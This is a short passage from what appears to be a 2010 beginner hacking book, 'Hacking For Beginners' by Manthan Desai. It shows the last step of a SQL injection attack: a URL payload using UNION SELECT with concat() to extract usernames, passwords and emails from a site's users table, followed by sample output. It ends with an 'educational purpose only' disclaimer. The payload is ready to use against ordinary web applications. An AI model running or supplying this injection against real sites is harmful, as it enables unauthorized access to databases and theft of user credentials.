Hacking For Beginners – Manthan Desai

now to complete query to put them all togetherfor that we use concat() , i decribe it earlier.i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:pass:blabla@whatever.com

2010

“ Do not use this hacks & trick in any criminal activities like phishing bank websites hacking theweb servers and please do not destroy any ones account this is only for educational purpose”.

www.hackingtech.co.tv

Page 150